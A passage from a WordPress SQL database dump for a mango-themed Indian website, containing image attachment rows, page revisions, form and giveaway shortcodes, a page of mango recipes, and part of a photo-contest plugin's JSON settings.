08:07:07',' ','','','publish','closed','closed','','685','','','2022-02-02 13:37:07','2022-02-02 08:07:07','',0,'https://mangomitra.in/2022/02/02/685/',1,'nav_menu_item','',0),(686,1,'2022-02-02 13:37:59','2022-02-02 08:07:59','','banner-Recovered-01-1','','inherit','open','closed','','banner-recovered-01-1','','','2022-02-02 13:37:59','2022-02-02 08:07:59','',682,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-01-1.png',0,'attachment','image/png',0),(687,1,'2022-02-02 13:38:10','2022-02-02 08:08:10','<!-- wp:image {\"id\":686,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-01-1-1024x479.png\" alt=\"\" class=\"wp-image-686\"/></figure>\n<!-- /wp:image -->','calender','','inherit','closed','closed','','682-revision-v1','','','2022-02-02 13:38:10','2022-02-02 08:08:10','',682,'https://mangomitra.in/?p=687',0,'revision','',0),(689,1,'2022-02-02 15:41:17','2022-02-02 10:11:17','','MITRA-06','','inherit','open','closed','','mitra-06','','','2022-02-02 15:41:17','2022-02-02 10:11:17','',0,'https://mangomitra.in/wp-content/uploads/2022/02/MITRA-06.png',0,'attachment','image/png',0),(691,1,'2022-02-02 15:43:05','2022-02-02 10:13:05','','final logo-06','','inherit','open','closed','','final-logo-06','','','2022-02-02 15:43:05','2022-02-02 10:13:05','',0,'https://mangomitra.in/wp-content/uploads/2022/02/final-logo-06.png',0,'attachment','image/png',0),(692,1,'2022-02-02 15:44:55','2022-02-02 10:14:55','https://mangomitra.in/wp-content/uploads/2022/02/cropped-final-logo-06.png','cropped-final-logo-06.png','','inherit','open','closed','','cropped-final-logo-06-png','','','2022-02-02 15:44:55','2022-02-02 10:14:55','',0,'https://mangomitra.in/wp-content/uploads/2022/02/cropped-final-logo-06.png',0,'attachment','image/png',0),(693,1,'2022-02-02 15:45:09','2022-02-02 10:15:09','https://mangomitra.in/wp-content/uploads/2022/02/cropped-MITRA-06.png','cropped-MITRA-06.png','Mango Mitra','inherit','open','closed','','cropped-mitra-06-png','','','2022-02-02 17:37:27','2022-02-02 12:07:27','',0,'https://mangomitra.in/wp-content/uploads/2022/02/cropped-MITRA-06.png',0,'attachment','image/png',0),(698,1,'2022-02-02 17:24:27','2022-02-02 11:54:27','','banner [Recovered]-01 (1)','','inherit','open','closed','','banner-recovered-01-1-2','','','2022-02-02 17:24:27','2022-02-02 11:54:27','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-01-1-1.png',0,'attachment','image/png',0),(702,1,'2022-02-02 18:03:40','2022-02-02 12:33:40','','banner [Recovered]-04','','inherit','open','closed','','banner-recovered-04-2','','','2022-02-02 18:03:40','2022-02-02 12:33:40','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-04.png',0,'attachment','image/png',0),(703,1,'2022-02-02 18:06:28','2022-02-02 12:36:28','','banner [Recovered]-03','','inherit','open','closed','','banner-recovered-03-2','','','2022-02-02 18:06:28','2022-02-02 12:36:28','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-03.png',0,'attachment','image/png',0),(710,1,'2022-02-04 12:11:30','2022-02-04 06:41:30','','calender-03','','inherit','open','closed','','calender-03','','','2022-02-04 12:11:30','2022-02-04 06:41:30','',0,'https://mangomitra.in/wp-content/uploads/2022/02/calender-03.png',0,'attachment','image/png',0),(712,1,'2022-02-04 12:13:00','2022-02-04 06:43:00','','banner 3-01','','inherit','open','closed','','banner-3-01','','','2022-02-04 12:13:45','2022-02-04 06:43:45','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-3-01.png',0,'attachment','image/png',0),(713,1,'2022-02-04 12:16:02','2022-02-04 06:46:02','','calender-03-1','','inherit','open','closed','','calender-03-1','','','2022-02-04 12:16:02','2022-02-04 06:46:02','',682,'https://mangomitra.in/wp-content/uploads/2022/02/calender-03-1.png',0,'attachment','image/png',0),(714,1,'2022-02-04 12:16:17','2022-02-04 06:46:17','<!-- wp:image {\"id\":713,\"width\":943,\"height\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-03-1-1024x479.png\" alt=\"\" class=\"wp-image-713\" width=\"943\" height=\"440\"/></figure>\n<!-- /wp:image -->','calender','','inherit','closed','closed','','682-revision-v1','','','2022-02-04 12:16:17','2022-02-04 06:46:17','',682,'https://mangomitra.in/?p=714',0,'revision','',0),(716,1,'2022-02-04 12:52:58','2022-02-04 07:22:58','<!-- wp:shortcode -->\n[cg_users_upload id=\"1\"]\n<!-- /wp:shortcode -->','Upload form','','publish','closed','closed','','upload-form','','','2022-02-04 12:52:59','2022-02-04 07:22:59','',0,'https://mangomitra.in/?page_id=716',0,'page','',0),(717,1,'2022-02-04 12:52:58','2022-02-04 07:22:58','<!-- wp:shortcode -->\n[cg_users_upload id=\"1\"]\n<!-- /wp:shortcode -->','Upload form','','inherit','closed','closed','','716-revision-v1','','','2022-02-04 12:52:58','2022-02-04 07:22:58','',716,'https://mangomitra.in/?p=717',0,'revision','',0),(718,1,'2022-02-04 12:53:55','2022-02-04 07:23:55','<!-- wp:shortcode -->\n[cg_users_reg id=\"1\"]\n<!-- /wp:shortcode -->','Registartion Form','','publish','open','open','','registartion-form','','','2022-02-04 12:53:56','2022-02-04 07:23:56','',0,'https://mangomitra.in/?p=718',0,'post','',0),(719,1,'2022-02-04 12:53:55','2022-02-04 07:23:55','<!-- wp:shortcode -->\n[cg_users_reg id=\"1\"]\n<!-- /wp:shortcode -->','Registartion Form','','inherit','closed','closed','','718-revision-v1','','','2022-02-04 12:53:55','2022-02-04 07:23:55','',718,'https://mangomitra.in/?p=719',0,'revision','',0),(720,1,'2022-02-04 12:54:59','2022-02-04 07:24:59','<!-- wp:shortcode -->\n[cg_users_login id=\"1\"]\n<!-- /wp:shortcode -->','User Login','','publish','closed','closed','','user-login','','','2022-02-04 12:55:00','2022-02-04 07:25:00','',0,'https://mangomitra.in/?page_id=720',0,'page','',0),(721,1,'2022-02-04 12:54:59','2022-02-04 07:24:59','<!-- wp:shortcode -->\n[cg_users_login id=\"1\"]\n<!-- /wp:shortcode -->','User Login','','inherit','closed','closed','','720-revision-v1','','','2022-02-04 12:54:59','2022-02-04 07:24:59','',720,'https://mangomitra.in/?p=721',0,'revision','',0),(732,1,'2022-02-04 16:01:04','2022-02-04 10:31:04','<!-- wp:rafflepress/giveaway-selector /-->','Give Away Contest','','publish','open','open','','give-away-contest','','','2022-02-04 16:01:05','2022-02-04 10:31:05','',0,'https://mangomitra.in/?p=732',0,'post','',0),(733,1,'2022-02-04 16:01:04','2022-02-04 10:31:04','<!-- wp:rafflepress/giveaway-selector /-->','Give Away Contest','','inherit','closed','closed','','732-revision-v1','','','2022-02-04 16:01:04','2022-02-04 10:31:04','',732,'https://mangomitra.in/?p=733',0,'revision','',0),(742,1,'2022-02-04 17:03:38','2022-02-04 11:33:38','','calender-03-2','','inherit','open','closed','','calender-03-2','','','2022-02-04 17:03:38','2022-02-04 11:33:38','',682,'https://mangomitra.in/wp-content/uploads/2022/02/calender-03-2.png',0,'attachment','image/png',0),(743,1,'2022-02-04 17:03:51','2022-02-04 11:33:51','<!-- wp:image {\"id\":713,\"width\":943,\"height\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-03-1-1024x479.png\" alt=\"\" class=\"wp-image-713\" width=\"943\" height=\"440\"/></figure>\n<!-- /wp:image -->','Calender','','inherit','closed','closed','','682-revision-v1','','','2022-02-04 17:03:51','2022-02-04 11:33:51','',682,'https://mangomitra.in/?p=743',0,'revision','',0),(745,1,'2022-02-04 17:07:04','2022-02-04 11:37:04','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":922,\"width\":183,\"height\":183,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-6-8.png\" alt=\"\" class=\"wp-image-922\" width=\"183\" height=\"183\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":927,\"width\":225,\"height\":225,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8-1.png\" alt=\"\" class=\"wp-image-927\" width=\"225\" height=\"225\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":928,\"width\":195,\"height\":195,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8-1.png\" alt=\"\" class=\"wp-image-928\" width=\"195\" height=\"195\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":929,\"width\":210,\"height\":210,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8-1.png\" alt=\"\" class=\"wp-image-929\" width=\"210\" height=\"210\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":917,\"width\":212,\"height\":212,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-1-8.png\" alt=\"\" class=\"wp-image-917\" width=\"212\" height=\"212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":930,\"width\":201,\"height\":201,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8-2.png\" alt=\"\" class=\"wp-image-930\" width=\"201\" height=\"201\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":919,\"width\":200,\"height\":200,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-4-8.png\" alt=\"\" class=\"wp-image-919\" width=\"200\" height=\"200\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Mango Recipes','','publish','closed','closed','','mango-recipes','','','2022-02-09 15:23:44','2022-02-09 09:53:44','',0,'https://mangomitra.in/?page_id=745',0,'page','',0),(747,1,'2022-02-04 17:07:04','2022-02-04 11:37:04','','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-04 17:07:04','2022-02-04 11:37:04','',745,'https://mangomitra.in/?p=747',0,'revision','',0),(748,1,'2022-02-04 17:07:04','2022-02-04 11:37:04',' ','','','publish','closed','closed','','748','','','2022-02-04 17:07:04','2022-02-04 11:37:04','',0,'https://mangomitra.in/2022/02/04/748/',2,'nav_menu_item','',0),(750,1,'2022-02-04 17:24:05','2022-02-04 11:54:05','<!-- wp:image {\"id\":713,\"width\":943,\"height\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-03-1-1024x479.png\" alt=\"\" class=\"wp-image-713\" width=\"943\" height=\"440\"/></figure>\n<!-- /wp:image -->','Mango Calendar','','inherit','closed','closed','','682-revision-v1','','','2022-02-04 17:24:05','2022-02-04 11:54:05','',682,'https://mangomitra.in/?p=750',0,'revision','',0),(751,1,'2022-02-04 17:37:11','2022-02-04 12:07:11','','logo 2-03','','inherit','open','closed','','logo-2-03','','','2022-02-04 17:37:11','2022-02-04 12:07:11','',0,'https://mangomitra.in/wp-content/uploads/2022/02/logo-2-03.png',0,'attachment','image/png',0),(753,1,'2022-02-04 17:38:36','2022-02-04 12:08:36','','calender-03-3','','inherit','open','closed','','calender-03-3','','','2022-02-04 17:38:36','2022-02-04 12:08:36','',682,'https://mangomitra.in/wp-content/uploads/2022/02/calender-03-3.png',0,'attachment','image/png',0),(754,1,'2022-02-04 17:38:56','2022-02-04 12:08:56','','calender-03-4','','inherit','open','closed','','calender-03-4','','','2022-02-04 17:38:56','2022-02-04 12:08:56','',682,'https://mangomitra.in/wp-content/uploads/2022/02/calender-03-4.png',0,'attachment','image/png',0),(756,1,'2022-02-04 17:39:54','2022-02-04 12:09:54','','calender-02','','inherit','open','closed','','calender-02','','','2022-02-04 17:39:54','2022-02-04 12:09:54','',682,'https://mangomitra.in/wp-content/uploads/2022/02/calender-02.png',0,'attachment','image/png',0),(757,1,'2022-02-04 17:40:11','2022-02-04 12:10:11','<!-- wp:image {\"id\":756,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-02-1024x479.png\" alt=\"\" class=\"wp-image-756\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-03-4-1024x479.png\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image -->','Mango Calendar','','inherit','closed','closed','','682-revision-v1','','','2022-02-04 17:40:11','2022-02-04 12:10:11','',682,'https://mangomitra.in/?p=757',0,'revision','',0),(758,1,'2022-02-04 18:03:41','2022-02-04 12:33:41','','final logo-02','','inherit','open','closed','','final-logo-02','','','2022-02-04 18:03:41','2022-02-04 12:33:41','',0,'https://mangomitra.in/wp-content/uploads/2022/02/final-logo-02.png',0,'attachment','image/png',0),(763,1,'2022-02-07 09:48:26','2022-02-07 04:18:26','','side 2-01','','inherit','open','closed','','side-2-01','','','2022-02-07 09:48:26','2022-02-07 04:18:26','',0,'https://mangomitra.in/wp-content/uploads/2022/02/side-2-01.png',0,'attachment','image/png',0),(773,1,'2022-02-07 10:58:28','2022-02-07 05:28:28','','bg-01','','inherit','open','closed','','bg-01','','','2022-02-07 10:58:28','2022-02-07 05:28:28','',0,'https://mangomitra.in/wp-content/uploads/2022/02/bg-01.png',0,'attachment','image/png',0),(778,1,'2022-02-07 11:08:07','2022-02-07 05:38:07',' ','','','publish','closed','closed','','778','','','2022-02-07 11:08:07','2022-02-07 05:38:07','',0,'https://mangomitra.in/2022/02/07/778/',1,'nav_menu_item','',0),(780,1,'2022-02-07 11:11:56','2022-02-07 05:41:56','','bg-01 (2)','','inherit','open','closed','','bg-01-2','','','2022-02-07 11:11:56','2022-02-07 05:41:56','',0,'https://mangomitra.in/wp-content/uploads/2022/02/bg-01-2.png',0,'attachment','image/png',0),(787,1,'2022-02-07 12:47:51','2022-02-07 07:17:51','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"a3fca085-d916-4a36-8e45-64c8fee76d59\",\"type\":\"text\",\"name\":\"field_copy_copy_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]},\"email\":{\"enabled\":true},\"filled\":{\"enabled\":true}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"eb87fb2a-e236-4a99-862e-c420572930cd\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filled\":{\"enabled\":true}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":0}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 